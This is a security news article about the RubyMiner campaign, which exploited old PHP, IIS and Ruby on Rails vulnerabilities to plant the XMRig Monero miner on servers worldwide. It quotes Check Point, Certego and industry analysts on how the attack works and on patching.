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RubyMiner malware plants XMRig on vulnerable systems. Security researchers have 
discovered malware aimed at Linux and Windows servers running to mine cryptocurrency. 



RubyMiner malware plants XMRig on vulnerable systems. Security researchers have discovered 
malware aimed at Linux and Windows servers running to mine cryptocurrency. 

According to researchers at Check Point, attackers have used malware called RubyMiner to infect 
systems with a cryptocurrency miner called XMrig. 

Researchers said in a blog post that over a 24-hour period last week, hackers attempted to 
compromise 30 percent of networks worldwide in order to find vulnerable web servers in order to 
mobilise them to their mining pool. It said that among the top countries targeted are the United States, 
Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed. 

Security firm Certego also noticed a huge spike in attacks as well. It said in a blog post that the exploit 
has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. 

According to Check Point, the attacker attempts to use multiple web server vulnerabilities to inject the 
malicious code onto the vulnerable machines. “Among the targeted servers we found attacks on PHP, 
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Microsoft IIS, and Ruby on Rails,” they said. 

Check Point researchers said that the hacker also made use of known vulnerabilities within Ruby on 
Rails and Microsoft IIS. The Ruby on Rails base64 encoded attack vector exploits CVE-2013-0156. 

The attacker sends a base64 encoded payload inside a POST request in the hope that the ruby 
interpreter configured on the server will execute it. 

“This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is 
executed once per hour (notice the number 1: it means every first minute of every hour) and it 
downloads the file robots.txt via wget. The file is piped through bash, so most probably it's a text file 
containing a shell script,” said researchers at Certego. 

Check Point researchers said that it is interesting to note that the scheduler isn't just being told to run 
the mining process every hour, it is being told to run the whole process, which includes downloading 
the file from the server. 

“This is possibly to allow the attacker to initiate an immediate kill switch for the miner bot. If the 
attacker would like to end the process on the infected machines, all that needs to be done is modify 
the robots.txt file on the compromised Webserver to be inactive. Within a minute, all the machines re- 
downloading the file will be receiving files without the cryptominers,” said Check Point researchers. 

Check Point said that one of the domains used in this attack, lochjol.com, was seen being used in 
another attack back in 2013. The previous attack also leveraged the vulnerability in Ruby on Rails, 
and shares some common features with the current attack 

“Nonetheless, we cannot determine the connection between the two, and, even if they share a 
common attacker, their purposes seem to be different,” said researchers. “In 2018, as in 2017, we 
continue to see blitz campaigns, leveraging unpatched vulnerabilities in many networks. This attack, 
like its predecessors, could have been prevented by simply patching old servers and deploying 
relevant security measures. 

Javvad Malik, security advocate at AlienVault, told SC Media UK that as cryptocurrencies gain 
popularity and value, they become a more attractive target to cyber-criminals. 

“Due to the fact that more and more variants emerge frequently, businesses should keep systems 
updated where possible, and invest in threat detection and response controls that can detect where 
malicious techniques are being used to mine cryptocurrencies,” he said. 

Andy Norton, director of threat intelligence at Lastline, told SC Media UK that Monero is taking over as 
the “bad boy” of cryptocurrencies due to its fungible nature and CPU friendly algorithm. 

“Mining payloads are becoming much more prevalent,” he said. “100 percent of internet connected 
networks experience compromise attempts on a daily basis. Best practice guidance on protecting 
infrastructure remains unchanged.” 
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